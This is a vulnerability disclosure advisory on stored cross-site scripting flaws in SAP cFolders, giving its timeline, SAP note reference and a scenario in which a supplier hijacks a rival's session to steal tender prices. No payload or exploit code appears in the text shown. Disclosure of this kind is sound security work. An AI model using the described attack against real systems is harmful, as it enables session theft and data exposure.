[ERPSCAN-09-014] SAP Cfolders Multiple Stored XSS Vulnerabilies

DSECRG Advisories

Application: SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms)
Vendor URL: http://sap.com
Bugs: Multiple Stored XSS
Risk: High
Exploits: YES
Reported: 04.12.2008
Vendor response: 05.12.2008
Vulnerability patched: 15.12.2008
Date of Public Advisory: 21.04.2009
Reference: SAP Security Note 1284360

cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information.
cFolders is part of a suite of applications powered by SAP NetWeaver that integrates project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments.
cFolders is integrated to SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios.

Business Risk
Legitimate user of SAP Cfolders engine (which is a part of PLM,CRM and Portal ) can insert a malicious script into its shared folder and gain unauthorized access to workstation of any user which will open shared folder. One of the possible scenarios is when one of the suppliers attacks another supplier to gain unauthorized access to his session and tender documentation with product or services prices.